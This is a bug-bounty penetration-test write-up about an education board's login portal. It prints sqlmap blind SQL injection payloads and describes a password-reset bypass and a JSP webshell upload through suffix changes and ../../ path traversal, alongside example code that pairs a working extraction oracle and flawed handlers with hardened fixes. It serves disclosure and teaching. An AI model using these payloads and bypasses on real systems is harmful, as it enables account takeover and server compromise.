I wanted to push a wave of points on Education SRC (ranked around 700) as quickly as possible by going after core assets, which is how the following penetration test came about.

The starting point is a login box, which also has a password-retrieval function.

It belongs to an education board.

After opening Burp and capturing the login request, I found that the password was sent unencrypted, so I tried to brute-force the admin account. The following error was returned once the attack ran, so brute-forcing looked like a dead end.

So I looked up the IP on FOFA: no other sites on the same host. On to the next function point to grind through, password retrieval.

Password recovery

There is obviously database interaction here, so I tested for SQL injection with a single quote and got a 500 back.

Threw it into sqlmap.

It came back with the following payloads:

sqlmap resumed the following injection point(s) from stored session:

Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: login_name=admin' AND 5698=5698 AND 'yKnB'='yKnB
    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: login_name=admin' AND (SELECT 3409 FROM (SELECT(SLEEP(5)))iWYb) AND 'ZAHe'='ZAHe
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
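To make the boolean-based blind finding above concrete, here is an added example (not code from the original post or from the target) that rebuilds the vulnerable lookup and drives it with the same payload shape sqlmap used, admin' AND (<condition>) AND 'x'='x, to recover a column value one character at a time, then shows the parameterised query that closes the hole. The table, column names and values are constructed; the real backend was MySQL, but SQLite is used here so the example runs offline (LENGTH, SUBSTR and UNICODE behave the same for this purpose).

```python
import sqlite3

# Constructed stand-in for the target's user table (assumption: the real
# schema is unknown; the real backend was MySQL, SQLite is used to run offline).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (login_name TEXT, password TEXT, mobile TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "s3cr3t!", ""), ("teacher01", "pass123", "13800000000")],
    )
    con.commit()
    return con


def vulnerable_lookup(con, login_name):
    """Models the password-retrieval endpoint: login_name is spliced straight
    into the WHERE clause, which is what sqlmap flagged. The caller only
    learns whether a row matched (the true/false answer the page gives)."""
    sql = f"SELECT 1 FROM users WHERE login_name='{login_name}'"
    return con.execute(sql).fetchone() is not None


def oracle(con, condition):
    """Same shape as sqlmap's payload: admin' AND (<condition>) AND 'x'='x.
    The trailing AND 'x'='x re-closes the quote the application appends."""
    return vulnerable_lookup(con, f"admin' AND ({condition}) AND 'x'='x")


def extract(con, expr, max_len=64):
    """Recover the string value of the scalar subquery `expr` one character
    at a time, binary-searching each code point through the boolean oracle
    (7 requests per character instead of up to 127)."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(con, f"LENGTH({expr}) >= {pos}"):
            break  # past the end of the string
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(con, f"UNICODE(SUBSTR({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def safe_lookup(con, login_name):
    """The fix: bind the value as a parameter instead of building SQL from it;
    the injected string is then compared against login_name literally."""
    row = con.execute("SELECT 1 FROM users WHERE login_name=?", (login_name,)).fetchone()
    return row is not None


def demo():
    con = make_db()
    admin_pw = extract(con, "(SELECT password FROM users WHERE login_name='admin')")
    injected_into_safe = safe_lookup(con, "admin' AND 1=1 AND 'x'='x")
    return admin_pw, injected_into_safe


if __name__ == "__main__":
    print(demo())  # ('s3cr3t!', False)
```

Against the real target each oracle() call is one HTTP request, so a password hash costs roughly 7 requests per character; that slowness is why the post moves on rather than dumping the database. The time-based variant sqlmap also found is the same inference with SLEEP() standing in for the true/false answer.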

Boolean-based and time-based blind injection are of little use for the rest of the penetration, so I kept fuzzing and tried to walk through the password-retrieval logic normally.

Capturing the response, there is clearly a success parameter with the value false; I changed it to true.

The page then showed the following: the flag parameter is not empty. This feels like a CTF. Replay the password request again.

A value for flag should be set here, but I did not know what it was and had no idea where to start.

OK, change of approach: since the admin account has no mobile number set, I enumerated accounts instead; there is always some account with a mobile number. A flag appeared, though at that point I did not know what it did. So I tested with accounts that do have a mobile number.

Enter any verification code and click Next. By now I roughly understood that this flag is equivalent to an ID.

We keep capturing the response, change the success parameter to true, and reach the password-reset page.

After setting the new password I captured the request with Burp and found two parameters, flag and pwdFlag, both of which we had already obtained while enumerating usernames. So I pulled them out separately and copied in the flag from earlier.

Send; the response is true, meaning the change succeeded.
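The reset worked because the server only looked at identifiers that any client could harvest from the lookup response, and never checked on its side that the SMS code step had actually passed. The following is an added example (not code from the original post or from the target) that models that flow next to a hardened one in which the reset token is issued only after the server itself verifies the code, is random, bound to the account, single-use and short-lived, so editing success in the response buys nothing. Account ids, names, the constant pwdFlag values and the 6-digit SMS code are constructed assumptions; the page only shows that flag and pwdFlag were reusable.

```python
import hmac
import secrets
import time

# Constructed accounts modelled on the page: admin has no mobile number, a
# second account does. Ids, names and pwdFlag values are assumptions.
ACCOUNTS = {
    101: {"login_name": "admin", "mobile": None, "password": "old-admin", "pwdFlag": "pf-101"},
    102: {"login_name": "teacher01", "mobile": "13800000000", "password": "old-teacher", "pwdFlag": "pf-102"},
}


def _by_name(accounts, login_name):
    for uid, acc in accounts.items():
        if acc["login_name"] == login_name:
            return uid, acc
    return None, None


class VulnerableReset:
    """Models the observed flow: lookup leaks the identifiers even when
    success is false, the code step changes nothing server-side, and
    reset trusts the identifiers alone."""

    def __init__(self):
        self.accounts = {k: dict(v) for k, v in ACCOUNTS.items()}

    def lookup(self, login_name):
        uid, acc = _by_name(self.accounts, login_name)
        if uid is None:
            return {"success": False}
        # success is only a hint for the client; flag and pwdFlag leak regardless
        return {"success": acc["mobile"] is not None, "flag": uid, "pwdFlag": acc["pwdFlag"]}

    def verify_code(self, flag, code):
        return {"success": False}  # whatever this says, the client decides what happens next

    def reset(self, flag, pwd_flag, new_password):
        acc = self.accounts.get(flag)
        if acc is None or pwd_flag != acc["pwdFlag"]:
            return False
        acc["password"] = new_password  # never checks that a code was verified for this account
        return True


class HardenedReset:
    """Server-side state machine: a reset token exists only after this server
    checked the SMS code for this account; the client's 'success' is ignored."""

    def __init__(self):
        self.accounts = {k: dict(v) for k, v in ACCOUNTS.items()}
        self.codes = {}    # flag -> (code, expiry)
        self.tokens = {}   # token -> (flag, expiry)
        self.outbox = []   # stands in for the SMS gateway

    def lookup(self, login_name):
        uid, acc = _by_name(self.accounts, login_name)
        if uid is None or acc["mobile"] is None:
            return {"success": False}  # no identifier leaks for unusable accounts
        code = f"{secrets.randbelow(10**6):06d}"
        self.codes[uid] = (code, time.time() + 300)
        self.outbox.append((acc["mobile"], code))
        return {"success": True, "flag": uid}

    def verify_code(self, flag, code):
        entry = self.codes.pop(flag, None)  # one attempt per code here; real systems allow a few, then lock
        if entry is None or time.time() > entry[1] or not hmac.compare_digest(entry[0], str(code)):
            return {"success": False}
        token = secrets.token_urlsafe(32)
        self.tokens[token] = (flag, time.time() + 600)
        return {"success": True, "pwdFlag": token}

    def reset(self, flag, pwd_flag, new_password):
        entry = self.tokens.pop(pwd_flag, None)  # pop makes the token single-use
        if entry is None or entry[0] != flag or time.time() > entry[1]:
            return False
        self.accounts[flag]["password"] = new_password
        return True


def attacker_replays(server, victim, new_password):
    """The page's steps against either server: harvest flag/pwdFlag from the
    lookup response, skip the code step, post the reset directly."""
    resp = server.lookup(victim)
    if "flag" not in resp:
        return False
    return server.reset(resp["flag"], resp.get("pwdFlag", resp["flag"]), new_password)


def legitimate_reset(server, login_name, new_password):
    """Happy path on the hardened server, reading the code off the outbox."""
    resp = server.lookup(login_name)
    step = server.verify_code(resp["flag"], server.outbox[-1][1])
    return server.reset(resp["flag"], step["pwdFlag"], new_password)


def demo():
    v, h = VulnerableReset(), HardenedReset()
    return (
        attacker_replays(v, "admin", "pwned"),      # True: identifiers alone reset admin
        v.accounts[101]["password"],                 # 'pwned'
        attacker_replays(h, "admin", "pwned"),      # False: admin has no mobile, no flag leaks
        attacker_replays(h, "teacher01", "pwned"),  # False: a flag is not a reset token
        h.accounts[102]["password"],                 # still 'old-teacher'
        legitimate_reset(h, "teacher01", "fresh"),  # True
        h.accounts[102]["password"],                 # 'fresh'
    )
```

The check to look for in a fix is the one in HardenedReset.reset: the reset endpoint must consume a server-issued token that could only have come from a successful verify_code for the same account, rather than anything the lookup response already handed out.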

Login successful.

Now that I am logged in, I am looking for an upload point.

It is a Java site, so the targets are JSP and JSPX. After some fuzzing I found an album management feature.

First I uploaded a picture and obtained the upload path.

Then I constructed a small JSP webshell and tried to upload it. The target has a WAF and JSP cannot be uploaded; no surprise there.

Looking at the suspicious parameters in the request: this is the file path we need, and the file name. We can try changing the file suffix here.

Conjecture confirmed.

Then I kept building the request and the upload succeeded. Concatenate it with the URL obtained earlier and try to access it.

It is printed back verbatim, so it seems this directory does not parse JSP.

The directory structure is clearly visible here, so try stripping some directories and uploading again.

For example, as in the screenshot below, the directory is skipped successfully.

Visiting it again, it is still printed verbatim. Rather than slowly fuzzing directory jumps one level at a time, I jumped straight to its root directory.

Analysis: this is the directory the original upload went to and was not parsed in; we can see there are four layers of directories.

After the bottom two layers of directories are removed, the directory still exists.

These two layers are skipped with ../../.

Concatenate with the earlier path and access it.
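The upload step above combines two weaknesses: the server accepts the client's path component unchanged, so ../../ walks the file out of the album directory that does not parse JSP and into one that does, and it accepts whatever suffix the client sends. The following is an added example (not code from the original post or from the target) that models that handler next to a hardened one, then runs both against a throwaway web root. The four-level directory mirrors the page; the directory names, the shell.jsp placeholder and the image allow-list are constructed assumptions, and the WAF is not modelled.

```python
import os
import secrets
import tempfile

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}  # what an album upload should accept


def vulnerable_save(webroot, upload_dir, client_path, client_name, data):
    """Models the album upload on the page: the path and file name sent by
    the client are joined onto the upload directory as-is, so '../../' in
    the path walks out of the non-parsing album folder and the suffix is
    whatever the client chose."""
    dest = os.path.normpath(os.path.join(webroot, upload_dir, client_path, client_name))
    os.makedirs(os.path.dirname(dest), exist_ok=True)
    with open(dest, "wb") as f:
        f.write(data)
    return dest


def inside(base, path):
    """True when `path` resolves to a location under `base` (symlinks and
    '..' collapsed first, so string-prefix tricks do not pass)."""
    base, path = os.path.realpath(base), os.path.realpath(path)
    return os.path.commonpath([base, path]) == base


def hardened_save(webroot, upload_dir, client_path, client_name, data):
    """Hardened form: extension allow-listed, stored name generated server-side,
    target directory checked to stay inside the upload root after resolution."""
    ext = os.path.splitext(client_name)[1].lower()
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension not allowed: {ext!r}")
    base = os.path.join(webroot, upload_dir)
    target_dir = os.path.join(base, client_path)
    if not inside(base, target_dir):
        raise ValueError("path escapes the upload directory")
    os.makedirs(target_dir, exist_ok=True)
    dest = os.path.join(os.path.realpath(target_dir), secrets.token_hex(8) + ext)
    with open(dest, "wb") as f:
        f.write(data)
    return dest


def demo():
    """Run both handlers against a temporary web root (constructed layout)."""
    with tempfile.TemporaryDirectory() as root:
        webroot = os.path.join(root, "webapp")
        upload_dir = os.path.join("upload", "album", "2023", "img")  # four layers, as on the page
        base = os.path.join(webroot, upload_dir)
        # attacker request: two levels up, JSP suffix (placeholder content)
        vuln_dest = vulnerable_save(webroot, upload_dir, "../../", "shell.jsp", b"<%-- --%>")
        results = {"vulnerable_escaped": not inside(base, vuln_dest)}
        for label, path, name in (
            ("hardened_blocks_traversal", "../../", "cat.png"),
            ("hardened_blocks_suffix", "", "shell.jsp"),
        ):
            try:
                hardened_save(webroot, upload_dir, path, name, b"x")
                results[label] = False
            except ValueError:
                results[label] = True
        ok_dest = hardened_save(webroot, upload_dir, "", "cat.png", b"\x89PNG")
        results["hardened_ok_inside"] = inside(base, ok_dest)
        return results


if __name__ == "__main__":
    print(demo())
```

Note that the containment check alone would not have stopped this upload if the suffix were still client-controlled: the file would simply land in the album directory with a .jsp name, and whether that is exploitable then depends only on which directories the servlet container parses. Both checks are needed.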

No authorization to go any further, so I stopped here, packaged it up and submitted it.

Bring on the code audit, guys.
